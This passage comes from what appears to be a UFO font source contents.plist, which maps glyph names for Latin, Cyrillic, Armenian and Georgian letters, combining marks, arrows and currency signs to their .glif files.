<string>tbar.glif</string> <key>tcaron</key> <string>tcaron.glif</string> <key>therefore</key> <string>therefore.glif</string> <key>theta</key> <string>theta.glif</string> <key>thorn</key> <string>thorn.glif</string> <key>three</key> <string>three.glif</string> <key>three.subs</key> <string>three.subs.glif</string> <key>threeeighths</key> <string>threeeighths.glif</string> <key>threequarters</key> <string>threequarters.glif</string> <key>tilde</key> <string>tilde.glif</string> <key>tildecomb</key> <string>tildecomb.glif</string> <key>tonos</key> <string>tonos.glif</string> <key>trademark</key> <string>trademark.glif</string> <key>triagdn</key> <string>triagdn.glif</string> <key>triaglf</key> <string>triaglf.glif</string> <key>triagrt</key> <string>triagrt.glif</string> <key>triagup</key> <string>triagup.glif</string> <key>two</key> <string>two.glif</string> <key>two.subs</key> <string>two.subs.glif</string> <key>u</key> <string>u.glif</string> <key>uacute</key> <string>uacute.glif</string> <key>ubreve</key> <string>ubreve.glif</string> <key>ucircumflex</key> <string>ucircumflex.glif</string> <key>udieresis</key> <string>udieresis.glif</string> <key>ugrave</key> <string>ugrave.glif</string> <key>uhorn</key> <string>uhorn.glif</string> <key>uhungarumlaut</key> <string>uhungarumlaut.glif</string> <key>umacron</key> <string>umacron.glif</string> <key>underscore</key> <string>underscore.glif</string> <key>underscoredbl</key> <string>underscoredbl.glif</string> <key>uni00A0</key> <string>uni00A_0.glif</string> <key>uni00AD</key> <string>uni00A_D_.glif</string> <key>uni00B2</key> <string>uni00B_2.glif</string> <key>uni00B3</key> <string>uni00B_3.glif</string> <key>uni00B5</key> <string>uni00B_5.glif</string> <key>uni00B9</key> <string>uni00B_9.glif</string> <key>uni0122</key> <string>uni0122.glif</string> <key>uni0123</key> <string>uni0123.glif</string> <key>uni0136</key> <string>uni0136.glif</string> <key>uni0137</key> <string>uni0137.glif</string> <key>uni013B</key> <string>uni013B_.glif</string> <key>uni013C</key> <string>uni013C_.glif</string> <key>uni0145</key> <string>uni0145.glif</string> <key>uni0146</key> <string>uni0146.glif</string> <key>uni0156</key> <string>uni0156.glif</string> <key>uni0157</key> <string>uni0157.glif</string> <key>uni0162</key> <string>uni0162.glif</string> <key>uni0163</key> <string>uni0163.glif</string> <key>uni01A4</key> <string>uni01A_4.glif</string> <key>uni0218</key> <string>uni0218.glif</string> <key>uni0219</key> <string>uni0219.glif</string> <key>uni021A</key> <string>uni021A_.glif</string> <key>uni021B</key> <string>uni021B_.glif</string> <key>uni02B9</key> <string>uni02B_9.glif</string> <key>uni02BB</key> <string>uni02B_B_.glif</string> <key>uni02BC</key> <string>uni02B_C_.glif</string> <key>uni02BD</key> <string>uni02B_D_.glif</string> <key>uni02BE</key> <string>uni02B_E_.glif</string> <key>uni02BF</key> <string>uni02B_F_.glif</string> <key>uni02C0</key> <string>uni02C_0.glif</string> <key>uni02C1</key> <string>uni02C_1.glif</string> <key>uni02C8</key> <string>uni02C_8.glif</string> <key>uni02C9</key> <string>uni02C_9.glif</string> <key>uni02CC</key> <string>uni02C_C_.glif</string> <key>uni02CD</key> <string>uni02C_D_.glif</string> <key>uni02CE</key> <string>uni02C_E_.glif</string> <key>uni02CF</key> <string>uni02C_F_.glif</string> <key>uni02D0</key> <string>uni02D_0.glif</string> <key>uni02D1</key> <string>uni02D_1.glif</string> <key>uni0302</key> <string>uni0302.glif</string> <key>uni0304</key> <string>uni0304.glif</string> <key>uni0304.case</key> <string>uni0304.case.glif</string> <key>uni0305</key> <string>uni0305.glif</string> <key>uni0306</key> <string>uni0306.glif</string> <key>uni0306.case</key> <string>uni0306.case.glif</string> <key>uni0307</key> <string>uni0307.glif</string> <key>uni0307.case</key> <string>uni0307.case.glif</string> <key>uni0308</key> <string>uni0308.glif</string> <key>uni030A</key> <string>uni030A_.glif</string> <key>uni030B</key> <string>uni030B_.glif</string> <key>uni030B.case</key> <string>uni030B_.case.glif</string> <key>uni030C</key> <string>uni030C_.glif</string> <key>uni030D</key> <string>uni030D_.glif</string> <key>uni030E</key> <string>uni030E_.glif</string> <key>uni030F</key> <string>uni030F_.glif</string> <key>uni030F.case</key> <string>uni030F_.case.glif</string> <key>uni0310</key> <string>uni0310.glif</string> <key>uni0311</key> <string>uni0311.glif</string> <key>uni0311.case</key> <string>uni0311.case.glif</string> <key>uni0312</key> <string>uni0312.glif</string> <key>uni0313</key> <string>uni0313.glif</string> <key>uni0314</key> <string>uni0314.glif</string> <key>uni0315</key> <string>uni0315.glif</string> <key>uni0316</key> <string>uni0316.glif</string> <key>uni0317</key> <string>uni0317.glif</string> <key>uni0318</key> <string>uni0318.glif</string> <key>uni0319</key> <string>uni0319.glif</string> <key>uni031A</key> <string>uni031A_.glif</string> <key>uni031B</key> <string>uni031B_.glif</string> <key>uni031C</key> <string>uni031C_.glif</string> <key>uni031D</key> <string>uni031D_.glif</string> <key>uni031E</key> <string>uni031E_.glif</string> <key>uni031F</key> <string>uni031F_.glif</string> <key>uni0320</key> <string>uni0320.glif</string> <key>uni0321</key> <string>uni0321.glif</string> <key>uni0322</key> <string>uni0322.glif</string> <key>uni0324</key> <string>uni0324.glif</string> <key>uni0325</key> <string>uni0325.glif</string> <key>uni0326</key> <string>uni0326.glif</string> <key>uni0327</key> <string>uni0327.glif</string> <key>uni0328</key> <string>uni0328.glif</string> <key>uni0329</key> <string>uni0329.glif</string> <key>uni032A</key> <string>uni032A_.glif</string> <key>uni032B</key> <string>uni032B_.glif</string> <key>uni032C</key> <string>uni032C_.glif</string> <key>uni032D</key> <string>uni032D_.glif</string> <key>uni032E</key> <string>uni032E_.glif</string> <key>uni032F</key> <string>uni032F_.glif</string> <key>uni0330</key> <string>uni0330.glif</string> <key>uni0331</key> <string>uni0331.glif</string> <key>uni0332</key> <string>uni0332.glif</string> <key>uni0333</key> <string>uni0333.glif</string> <key>uni0334</key> <string>uni0334.glif</string> <key>uni0335</key> <string>uni0335.glif</string> <key>uni0336</key> <string>uni0336.glif</string> <key>uni0337</key> <string>uni0337.glif</string> <key>uni0338</key> <string>uni0338.glif</string> <key>uni0339</key> <string>uni0339.glif</string> <key>uni033A</key> <string>uni033A_.glif</string> <key>uni033B</key> <string>uni033B_.glif</string> <key>uni033C</key> <string>uni033C_.glif</string> <key>uni033D</key> <string>uni033D_.glif</string> <key>uni033E</key> <string>uni033E_.glif</string> <key>uni033F</key> <string>uni033F_.glif</string> <key>uni0358</key> <string>uni0358.glif</string> <key>uni0361</key> <string>uni0361.glif</string> <key>uni0394</key> <string>uni0394.glif</string> <key>uni03A9</key> <string>uni03A_9.glif</string> <key>uni03BC</key> <string>uni03B_C_.glif</string> <key>uni03C2</key> <string>uni03C_2.glif</string> <key>uni03F4</key> <string>uni03F_4.glif</string> <key>uni0400</key> <string>uni0400.glif</string> <key>uni0401</key> <string>uni0401.glif</string> <key>uni0402</key> <string>uni0402.glif</string> <key>uni0403</key> <string>uni0403.glif</string> <key>uni0404</key> <string>uni0404.glif</string> <key>uni0405</key> <string>uni0405.glif</string> <key>uni0406</key> <string>uni0406.glif</string> <key>uni0407</key> <string>uni0407.glif</string> <key>uni0408</key> <string>uni0408.glif</string> <key>uni0409</key> <string>uni0409.glif</string> <key>uni040A</key> <string>uni040A_.glif</string> <key>uni040B</key> <string>uni040B_.glif</string> <key>uni040C</key> <string>uni040C_.glif</string> <key>uni040D</key> <string>uni040D_.glif</string> <key>uni040E</key> <string>uni040E_.glif</string> <key>uni040F</key> <string>uni040F_.glif</string> <key>uni0410</key> <string>uni0410.glif</string> <key>uni0411</key> <string>uni0411.glif</string> <key>uni0412</key> <string>uni0412.glif</string> <key>uni0413</key> <string>uni0413.glif</string> <key>uni0414</key> <string>uni0414.glif</string> <key>uni0415</key> <string>uni0415.glif</string> <key>uni0416</key> <string>uni0416.glif</string> <key>uni0417</key> <string>uni0417.glif</string> <key>uni0418</key> <string>uni0418.glif</string> <key>uni0419</key> <string>uni0419.glif</string> <key>uni041A</key> <string>uni041A_.glif</string> <key>uni041B</key> <string>uni041B_.glif</string> <key>uni041C</key> <string>uni041C_.glif</string> <key>uni041D</key> <string>uni041D_.glif</string> <key>uni041E</key> <string>uni041E_.glif</string> <key>uni041F</key> <string>uni041F_.glif</string> <key>uni0420</key> <string>uni0420.glif</string> <key>uni0421</key> <string>uni0421.glif</string> <key>uni0422</key> <string>uni0422.glif</string> <key>uni0423</key> <string>uni0423.glif</string> <key>uni0424</key> <string>uni0424.glif</string> <key>uni0425</key> <string>uni0425.glif</string> <key>uni0426</key> <string>uni0426.glif</string> <key>uni0427</key> <string>uni0427.glif</string> <key>uni0428</key> <string>uni0428.glif</string> <key>uni0429</key> <string>uni0429.glif</string> <key>uni042A</key> <string>uni042A_.glif</string> <key>uni042B</key> <string>uni042B_.glif</string> <key>uni042C</key> <string>uni042C_.glif</string> <key>uni042D</key> <string>uni042D_.glif</string> <key>uni042E</key> <string>uni042E_.glif</string> <key>uni042F</key> <string>uni042F_.glif</string> <key>uni0430</key> <string>uni0430.glif</string> <key>uni0431</key> <string>uni0431.glif</string> <key>uni0432</key> <string>uni0432.glif</string> <key>uni0433</key> <string>uni0433.glif</string> <key>uni0434</key> <string>uni0434.glif</string> <key>uni0435</key> <string>uni0435.glif</string> <key>uni0436</key> <string>uni0436.glif</string> <key>uni0437</key> <string>uni0437.glif</string> <key>uni0438</key> <string>uni0438.glif</string> <key>uni0439</key> <string>uni0439.glif</string> <key>uni043A</key> <string>uni043A_.glif</string> <key>uni043B</key> <string>uni043B_.glif</string> <key>uni043C</key> <string>uni043C_.glif</string> <key>uni043D</key> <string>uni043D_.glif</string> <key>uni043E</key> <string>uni043E_.glif</string> <key>uni043F</key> <string>uni043F_.glif</string> <key>uni0440</key> <string>uni0440.glif</string> <key>uni0441</key> <string>uni0441.glif</string> <key>uni0442</key> <string>uni0442.glif</string> <key>uni0443</key> <string>uni0443.glif</string> <key>uni0444</key> <string>uni0444.glif</string> <key>uni0445</key> <string>uni0445.glif</string> <key>uni0446</key> <string>uni0446.glif</string> <key>uni0447</key> <string>uni0447.glif</string> <key>uni0448</key> <string>uni0448.glif</string> <key>uni0449</key> <string>uni0449.glif</string> <key>uni044A</key> <string>uni044A_.glif</string> <key>uni044B</key> <string>uni044B_.glif</string> <key>uni044C</key> <string>uni044C_.glif</string> <key>uni044D</key> <string>uni044D_.glif</string> <key>uni044E</key> <string>uni044E_.glif</string> <key>uni044F</key> <string>uni044F_.glif</string> <key>uni0450</key> <string>uni0450.glif</string> <key>uni0451</key> <string>uni0451.glif</string> <key>uni0452</key> <string>uni0452.glif</string> <key>uni0453</key> <string>uni0453.glif</string> <key>uni0454</key> <string>uni0454.glif</string> <key>uni0455</key> <string>uni0455.glif</string> <key>uni0456</key> <string>uni0456.glif</string> <key>uni0457</key> <string>uni0457.glif</string> <key>uni0458</key> <string>uni0458.glif</string> <key>uni0459</key> <string>uni0459.glif</string> <key>uni045A</key> <string>uni045A_.glif</string> <key>uni045B</key> <string>uni045B_.glif</string> <key>uni045C</key> <string>uni045C_.glif</string> <key>uni045D</key> <string>uni045D_.glif</string> <key>uni045E</key> <string>uni045E_.glif</string> <key>uni045F</key> <string>uni045F_.glif</string> <key>uni0462</key> <string>uni0462.glif</string> <key>uni0463</key> <string>uni0463.glif</string> <key>uni0472</key> <string>uni0472.glif</string> <key>uni0473</key> <string>uni0473.glif</string> <key>uni0490</key> <string>uni0490.glif</string> <key>uni0491</key> <string>uni0491.glif</string> <key>uni0492</key> <string>uni0492.glif</string> <key>uni0493</key> <string>uni0493.glif</string> <key>uni0494</key> <string>uni0494.glif</string> <key>uni0495</key> <string>uni0495.glif</string> <key>uni0496</key> <string>uni0496.glif</string> <key>uni0497</key> <string>uni0497.glif</string> <key>uni0498</key> <string>uni0498.glif</string> <key>uni0499</key> <string>uni0499.glif</string> <key>uni049A</key> <string>uni049A_.glif</string> <key>uni049B</key> <string>uni049B_.glif</string> <key>uni04A2</key> <string>uni04A_2.glif</string> <key>uni04A3</key> <string>uni04A_3.glif</string> <key>uni04A4</key> <string>uni04A_4.glif</string> <key>uni04A5</key> <string>uni04A_5.glif</string> <key>uni04AA</key> <string>uni04A_A_.glif</string> <key>uni04AB</key> <string>uni04A_B_.glif</string> <key>uni04AC</key> <string>uni04A_C_.glif</string> <key>uni04AD</key> <string>uni04A_D_.glif</string> <key>uni04AE</key> <string>uni04A_E_.glif</string> <key>uni04AF</key> <string>uni04A_F_.glif</string> <key>uni04B0</key> <string>uni04B_0.glif</string> <key>uni04B1</key> <string>uni04B_1.glif</string> <key>uni04B2</key> <string>uni04B_2.glif</string> <key>uni04B3</key> <string>uni04B_3.glif</string> <key>uni04BA</key> <string>uni04B_A_.glif</string> <key>uni04BB</key> <string>uni04B_B_.glif</string> <key>uni04C0</key> <string>uni04C_0.glif</string> <key>uni04C1</key> <string>uni04C_1.glif</string> <key>uni04C2</key> <string>uni04C_2.glif</string> <key>uni04C3</key> <string>uni04C_3.glif</string> <key>uni04C4</key> <string>uni04C_4.glif</string> <key>uni04C7</key> <string>uni04C_7.glif</string> <key>uni04C8</key> <string>uni04C_8.glif</string> <key>uni04CB</key> <string>uni04C_B_.glif</string> <key>uni04CC</key> <string>uni04C_C_.glif</string> <key>uni04CF</key> <string>uni04C_F_.glif</string> <key>uni04D0</key> <string>uni04D_0.glif</string> <key>uni04D1</key> <string>uni04D_1.glif</string> <key>uni04D2</key> <string>uni04D_2.glif</string> <key>uni04D3</key> <string>uni04D_3.glif</string> <key>uni04D4</key> <string>uni04D_4.glif</string> <key>uni04D5</key> <string>uni04D_5.glif</string> <key>uni04D6</key> <string>uni04D_6.glif</string> <key>uni04D7</key> <string>uni04D_7.glif</string> <key>uni04D8</key> <string>uni04D_8.glif</string> <key>uni04D9</key> <string>uni04D_9.glif</string> <key>uni04DA</key> <string>uni04D_A_.glif</string> <key>uni04DB</key> <string>uni04D_B_.glif</string> <key>uni04DC</key> <string>uni04D_C_.glif</string> <key>uni04DD</key> <string>uni04D_D_.glif</string> <key>uni04DE</key> <string>uni04D_E_.glif</string> <key>uni04DF</key> <string>uni04D_F_.glif</string> <key>uni04E0</key> <string>uni04E_0.glif</string> <key>uni04E1</key> <string>uni04E_1.glif</string> <key>uni04E2</key> <string>uni04E_2.glif</string> <key>uni04E3</key> <string>uni04E_3.glif</string> <key>uni04E4</key> <string>uni04E_4.glif</string> <key>uni04E5</key> <string>uni04E_5.glif</string> <key>uni04E6</key> <string>uni04E_6.glif</string> <key>uni04E7</key> <string>uni04E_7.glif</string> <key>uni04E8</key> <string>uni04E_8.glif</string> <key>uni04E9</key> <string>uni04E_9.glif</string> <key>uni04EA</key> <string>uni04E_A_.glif</string> <key>uni04EB</key> <string>uni04E_B_.glif</string> <key>uni04EC</key> <string>uni04E_C_.glif</string> <key>uni04ED</key> <string>uni04E_D_.glif</string> <key>uni04EE</key> <string>uni04E_E_.glif</string> <key>uni04EF</key> <string>uni04E_F_.glif</string> <key>uni04F0</key> <string>uni04F_0.glif</string> <key>uni04F1</key> <string>uni04F_1.glif</string> <key>uni04F2</key> <string>uni04F_2.glif</string> <key>uni04F3</key> <string>uni04F_3.glif</string> <key>uni04F4</key> <string>uni04F_4.glif</string> <key>uni04F5</key> <string>uni04F_5.glif</string> <key>uni04F6</key> <string>uni04F_6.glif</string> <key>uni04F7</key> <string>uni04F_7.glif</string> <key>uni04F8</key> <string>uni04F_8.glif</string> <key>uni04F9</key> <string>uni04F_9.glif</string> <key>uni0510</key> <string>uni0510.glif</string> <key>uni0511</key> <string>uni0511.glif</string> <key>uni051A</key> <string>uni051A_.glif</string> <key>uni051B</key> <string>uni051B_.glif</string> <key>uni051C</key> <string>uni051C_.glif</string> <key>uni051D</key> <string>uni051D_.glif</string> <key>uni0531</key> <string>uni0531.glif</string> <key>uni0532</key> <string>uni0532.glif</string> <key>uni0533</key> <string>uni0533.glif</string> <key>uni0534</key> <string>uni0534.glif</string> <key>uni0535</key> <string>uni0535.glif</string> <key>uni0536</key> <string>uni0536.glif</string> <key>uni0537</key> <string>uni0537.glif</string> <key>uni0538</key> <string>uni0538.glif</string> <key>uni0539</key> <string>uni0539.glif</string> <key>uni053A</key> <string>uni053A_.glif</string> <key>uni053B</key> <string>uni053B_.glif</string> <key>uni053C</key> <string>uni053C_.glif</string> <key>uni053D</key> <string>uni053D_.glif</string> <key>uni053E</key> <string>uni053E_.glif</string> <key>uni053F</key> <string>uni053F_.glif</string> <key>uni0540</key> <string>uni0540.glif</string> <key>uni0541</key> <string>uni0541.glif</string> <key>uni0542</key> <string>uni0542.glif</string> <key>uni0543</key> <string>uni0543.glif</string> <key>uni0544</key> <string>uni0544.glif</string> <key>uni0545</key> <string>uni0545.glif</string> <key>uni0546</key> <string>uni0546.glif</string> <key>uni0547</key> <string>uni0547.glif</string> <key>uni0548</key> <string>uni0548.glif</string> <key>uni0549</key> <string>uni0549.glif</string> <key>uni054A</key> <string>uni054A_.glif</string> <key>uni054B</key> <string>uni054B_.glif</string> <key>uni054C</key> <string>uni054C_.glif</string> <key>uni054D</key> <string>uni054D_.glif</string> <key>uni054E</key> <string>uni054E_.glif</string> <key>uni054F</key> <string>uni054F_.glif</string> <key>uni0550</key> <string>uni0550.glif</string> <key>uni0551</key> <string>uni0551.glif</string> <key>uni0552</key> <string>uni0552.glif</string> <key>uni0553</key> <string>uni0553.glif</string> <key>uni0554</key> <string>uni0554.glif</string> <key>uni0555</key> <string>uni0555.glif</string> <key>uni0556</key> <string>uni0556.glif</string> <key>uni0559</key> <string>uni0559.glif</string> <key>uni055A</key> <string>uni055A_.glif</string> <key>uni055B</key> <string>uni055B_.glif</string> <key>uni055C</key> <string>uni055C_.glif</string> <key>uni055D</key> <string>uni055D_.glif</string> <key>uni055E</key> <string>uni055E_.glif</string> <key>uni055F</key> <string>uni055F_.glif</string> <key>uni0561</key> <string>uni0561.glif</string> <key>uni0562</key> <string>uni0562.glif</string> <key>uni0563</key> <string>uni0563.glif</string> <key>uni0564</key> <string>uni0564.glif</string> <key>uni0565</key> <string>uni0565.glif</string> <key>uni0566</key> <string>uni0566.glif</string> <key>uni0567</key> <string>uni0567.glif</string> <key>uni0568</key> <string>uni0568.glif</string> <key>uni0569</key> <string>uni0569.glif</string> <key>uni056A</key> <string>uni056A_.glif</string> <key>uni056B</key> <string>uni056B_.glif</string> <key>uni056C</key> <string>uni056C_.glif</string> <key>uni056D</key> <string>uni056D_.glif</string> <key>uni056E</key> <string>uni056E_.glif</string> <key>uni056F</key> <string>uni056F_.glif</string> <key>uni0570</key> <string>uni0570.glif</string> <key>uni0571</key> <string>uni0571.glif</string> <key>uni0572</key> <string>uni0572.glif</string> <key>uni0573</key> <string>uni0573.glif</string> <key>uni0574</key> <string>uni0574.glif</string> <key>uni0575</key> <string>uni0575.glif</string> <key>uni0576</key> <string>uni0576.glif</string> <key>uni0577</key> <string>uni0577.glif</string> <key>uni0578</key> <string>uni0578.glif</string> <key>uni0579</key> <string>uni0579.glif</string> <key>uni057A</key> <string>uni057A_.glif</string> <key>uni057B</key> <string>uni057B_.glif</string> <key>uni057C</key> <string>uni057C_.glif</string> <key>uni057D</key> <string>uni057D_.glif</string> <key>uni057E</key> <string>uni057E_.glif</string> <key>uni057F</key> <string>uni057F_.glif</string> <key>uni0580</key> <string>uni0580.glif</string> <key>uni0581</key> <string>uni0581.glif</string> <key>uni0582</key> <string>uni0582.glif</string> <key>uni0583</key> <string>uni0583.glif</string> <key>uni0584</key> <string>uni0584.glif</string> <key>uni0585</key> <string>uni0585.glif</string> <key>uni0586</key> <string>uni0586.glif</string> <key>uni0587</key> <string>uni0587.glif</string> <key>uni0589</key> <string>uni0589.glif</string> <key>uni058A</key> <string>uni058A_.glif</string> <key>uni0E3F</key> <string>uni0E_3F_.glif</string> <key>uni10D0</key> <string>uni10D_0.glif</string> <key>uni10D1</key> <string>uni10D_1.glif</string> <key>uni10D2</key> <string>uni10D_2.glif</string> <key>uni10D3</key> <string>uni10D_3.glif</string> <key>uni10D4</key> <string>uni10D_4.glif</string> <key>uni10D5</key> <string>uni10D_5.glif</string> <key>uni10D6</key> <string>uni10D_6.glif</string> <key>uni10D7</key> <string>uni10D_7.glif</string> <key>uni10D8</key> <string>uni10D_8.glif</string> <key>uni10D9</key> <string>uni10D_9.glif</string> <key>uni10DA</key> <string>uni10D_A_.glif</string> <key>uni10DB</key> <string>uni10D_B_.glif</string> <key>uni10DC</key> <string>uni10D_C_.glif</string> <key>uni10DD</key> <string>uni10D_D_.glif</string> <key>uni10DE</key> <string>uni10D_E_.glif</string> <key>uni10DF</key> <string>uni10D_F_.glif</string> <key>uni10E0</key> <string>uni10E_0.glif</string> <key>uni10E1</key> <string>uni10E_1.glif</string> <key>uni10E2</key> <string>uni10E_2.glif</string> <key>uni10E3</key> <string>uni10E_3.glif</string> <key>uni10E4</key> <string>uni10E_4.glif</string> <key>uni10E5</key> <string>uni10E_5.glif</string> <key>uni10E6</key> <string>uni10E_6.glif</string> <key>uni10E7</key> <string>uni10E_7.glif</string> <key>uni10E8</key> <string>uni10E_8.glif</string> <key>uni10E9</key> <string>uni10E_9.glif</string> <key>uni10EA</key> <string>uni10E_A_.glif</string> <key>uni10EB</key> <string>uni10E_B_.glif</string> <key>uni10EC</key> <string>uni10E_C_.glif</string> <key>uni10ED</key> <string>uni10E_D_.glif</string> <key>uni10EE</key> <string>uni10E_E_.glif</string> <key>uni10EF</key> <string>uni10E_F_.glif</string> <key>uni10F0</key> <string>uni10F_0.glif</string> <key>uni10F1</key> <string>uni10F_1.glif</string> <key>uni10F2</key> <string>uni10F_2.glif</string> <key>uni10F3</key> <string>uni10F_3.glif</string> <key>uni10F4</key> <string>uni10F_4.glif</string> <key>uni10F5</key> <string>uni10F_5.glif</string> <key>uni10F6</key> <string>uni10F_6.glif</string> <key>uni10F7</key> <string>uni10F_7.glif</string> <key>uni10F8</key> <string>uni10F_8.glif</string> <key>uni10F9</key> <string>uni10F_9.glif</string> <key>uni10FA</key> <string>uni10F_A_.glif</string> <key>uni10FB</key> <string>uni10F_B_.glif</string> <key>uni10FC</key> <string>uni10F_C_.glif</string> <key>uni1EBC</key> <string>uni1E_B_C_.glif</string> <key>uni1EBD</key> <string>uni1E_B_D_.glif</string> <key>uni1EF8</key> <string>uni1E_F_8.glif</string> <key>uni1EF9</key> <string>uni1E_F_9.glif</string> <key>uni2000</key> <string>uni2000.glif</string> <key>uni2001</key> <string>uni2001.glif</string> <key>uni2002</key> <string>uni2002.glif</string> <key>uni2003</key> <string>uni2003.glif</string> <key>uni2004</key> <string>uni2004.glif</string> <key>uni2005</key> <string>uni2005.glif</string> <key>uni2006</key> <string>uni2006.glif</string> <key>uni2007</key> <string>uni2007.glif</string> <key>uni2008</key> <string>uni2008.glif</string> <key>uni2009</key> <string>uni2009.glif</string> <key>uni200A</key> <string>uni200A_.glif</string> <key>uni2010</key> <string>uni2010.glif</string> <key>uni2011</key> <string>uni2011.glif</string> <key>uni2015</key> <string>uni2015.glif</string> <key>uni2016</key> <string>uni2016.glif</string> <key>uni201F</key> <string>uni201F_.glif</string> <key>uni2023</key> <string>uni2023.glif</string> <key>hyphenationpoint</key> <string>hyphenationpoint.glif</string> <key>uni202F</key> <string>uni202F_.glif</string> <key>uni2031</key> <string>uni2031.glif</string> <key>minute</key> <string>minute.glif</string> <key>second</key> <string>second.glif</string> <key>millisecond</key> <string>millisecond.glif</string> <key>uni2035</key> <string>uni2035.glif</string> <key>uni2036</key> <string>uni2036.glif</string> <key>uni2037</key> <string>uni2037.glif</string> <key>uni203D</key> <string>uni203D_.glif</string> <key>uni203E</key> <string>uni203E_.glif</string> <key>uni203F</key> <string>uni203F_.glif</string> <key>uni2045</key> <string>uni2045.glif</string> <key>uni2046</key> <string>uni2046.glif</string> <key>uni2047</key> <string>uni2047.glif</string> <key>uni2048</key> <string>uni2048.glif</string> <key>uni2049</key> <string>uni2049.glif</string> <key>uni204B</key> <string>uni204B_.glif</string> <key>uni205F</key> <string>uni205F_.glif</string> <key>uni2070</key> <string>uni2070.glif</string> <key>uni2074</key> <string>uni2074.glif</string> <key>uni2075</key> <string>uni2075.glif</string> <key>uni2076</key> <string>uni2076.glif</string> <key>uni2077</key> <string>uni2077.glif</string> <key>uni2078</key> <string>uni2078.glif</string> <key>uni2079</key> <string>uni2079.glif</string> <key>uni207A</key> <string>uni207A_.glif</string> <key>uni207B</key> <string>uni207B_.glif</string> <key>uni207C</key> <string>uni207C_.glif</string> <key>uni207D</key> <string>uni207D_.glif</string> <key>uni207E</key> <string>uni207E_.glif</string> <key>uni208A</key> <string>uni208A_.glif</string> <key>uni208B</key> <string>uni208B_.glif</string> <key>uni208C</key> <string>uni208C_.glif</string> <key>uni208D</key> <string>uni208D_.glif</string> <key>uni208E</key> <string>uni208E_.glif</string> <key>uni20A0</key> <string>uni20A_0.glif</string> <key>uni20A2</key> <string>uni20A_2.glif</string> <key>uni20A5</key> <string>uni20A_5.glif</string> <key>uni20A6</key> <string>uni20A_6.glif</string> <key>uni20A8</key> <string>uni20A_8.glif</string> <key>uni20A9</key> <string>uni20A_9.glif</string> <key>uni20AA</key> <string>uni20A_A_.glif</string> <key>uni20AD</key> <string>uni20A_D_.glif</string> <key>uni20AE</key> <string>uni20A_E_.glif</string> <key>uni20AF</key> <string>uni20A_F_.glif</string> <key>uni20B0</key> <string>uni20B_0.glif</string> <key>uni20B1</key> <string>uni20B_1.glif</string> <key>uni20B2</key> <string>uni20B_2.glif</string> <key>uni20B3</key> <string>uni20B_3.glif</string> <key>uni20B4</key> <string>uni20B_4.glif</string> <key>uni20B5</key> <string>uni20B_5.glif</string> <key>uni20B7</key> <string>uni20B_7.glif</string> <key>uni20B8</key> <string>uni20B_8.glif</string> <key>uni20B9</key> <string>uni20B_9.glif</string> <key>uni2116</key> <string>uni2116.glif</string> <key>uni2126</key> <string>uni2126.glif</string> <key>uni2150</key> <string>uni2150.glif</string> <key>uni2151</key> <string>uni2151.glif</string> <key>uni2153</key> <string>uni2153.glif</string> <key>uni2154</key> <string>uni2154.glif</string> <key>uni2155</key> <string>uni2155.glif</string> <key>uni2156</key> <string>uni2156.glif</string> <key>uni2157</key> <string>uni2157.glif</string> <key>uni2158</key> <string>uni2158.glif</string> <key>uni2159</key> <string>uni2159.glif</string> <key>uni215A</key> <string>uni215A_.glif</string> <key>uni215F</key> <string>uni215F_.glif</string> <key>uni2189</key> <string>uni2189.glif</string> <key>uni2196</key> <string>uni2196.glif</string> <key>uni2197</key> <string>uni2197.glif</string> <key>uni2198</key> <string>uni2198.glif</string> <key>uni2199</key> <string>uni2199.glif</string> <key>uni219A</key> <string>uni219A_.glif</string> <key>uni219B</key> <string>uni219B_.glif</string> <key>uni219C</key> <string>uni219C_.glif</string> <key>uni219D</key> <string>uni219D_.glif</string> <key>uni219E</key> <string>uni219E_.glif</string> <key>uni219F</key> <string>uni219F_.glif</string> <key>uni21A0</key> <string>uni21A_0.glif</string> <key>uni21A1</key> <string>uni21A_1.glif</string> <key>uni21A2</key> <string>uni21A_2.glif</string> <key>uni21A3</key> <string>uni21A_3.glif</string> <key>uni21A4</key> <string>uni21A_4.glif</string> <key>uni21A5</key> <string>uni21A_5.glif</string> <key>uni21A6</key> <string>uni21A_6.glif</string> <key>uni21A7</key> <string>uni21A_7.glif</string> <key>uni21A9</key> <string>uni21A_9.glif</string> <key>uni21AA</key> <string>uni21A_A_.glif</string> <key>uni21AB</key> <string>uni21A_B_.glif</string> <key>uni21AC</key> <string>uni21A_C_.glif</string> <key>uni21AD</key> <string>uni21A_D_.glif</string> <key>uni21AE</key> <string>uni21A_E_.glif</string> <key>uni21AF</key> <string>uni21A_F_.glif</string> <key>uni21B0</key> <string>uni21B_0.glif</string> <key>uni21B1</key> <string>uni21B_1.glif</string> <key>uni21B2</key> <string>uni21B_2.glif</string> <key>uni21B3</key> <string>uni21B_3.glif</string> <key>uni21B4</key> <string>uni21B_4.glif</string> <key>uni21B6</key> <string>uni21B_6.glif</string> <key>uni21B7</key> <string>uni21B_7.glif</string> <key>uni21B8</key> <string>uni21B_8.glif</string> <key>uni21B9</key> <string>uni21B_9.glif</string> <key>uni21BA</key> <string>uni21B_A_.glif</string> <key>uni21BB</key> <string>uni21B_B_.glif</string> <key>uni21BC</key> <string>uni21B_C_.glif</string> <key>uni21BD</key> <string>uni21B_D_.glif</string> <key>uni21BE</key> <string>uni21B_E_.glif</string> <key>uni21BF</key> <string>uni21B_F_.glif</string> <key>uni21C0</key> <string>uni21C_0.glif</string> <key>uni21C1</key> <string>uni21C_1.glif</string> <key>uni21C2</key> <string>uni21C_2.glif</string> <key>uni21C3</key> <string>uni21C_3.glif</string> <key>uni21C4</key> <string>uni21C_4.glif</string> <key>uni21C5</key> <string>uni21C_5.glif</string> <key>uni21C6</key> <string>uni21C_6.glif</string> <key>uni21C7</key> <string>uni21C_7.glif</string> <key>uni21C8</key> <string>uni21C_8.glif</string> <key>uni21C9</key> <string>uni21C_9.glif</string> <key>uni21CA</key> <string>uni21C_A_.glif</string> <key>uni21CB</key> <string>uni21C_B_.glif</string> <key>uni21CC</key> <string>uni21C_C_.glif</string> <key>uni21CD</key> <string>uni21C_D_.glif</string> <key>uni21CE</key> <string>uni21C_E_.glif</string> <key>uni21CF</key> <string>uni21C_F_.glif</string> <key>uni21D5</key> <string>uni21D_5.glif</string> <key>uni21D6</key> <string>uni21D_6.glif</string> <key>uni21D7</key> <string>uni21D_7.glif</string> <key>uni21D8</key> <string>uni21D_8.glif</string> <key>uni21D9</key> <string>uni21D_9.glif</string> <key>uni21DA</key> <string>uni21D_A_.glif</string> <key>uni21DB</key> <string>uni21D_B_.glif</string> <key>uni21DC</key> <string>uni21D_C_.glif</string> <key>uni21DD</key> <string>uni21D_D_.glif</string> 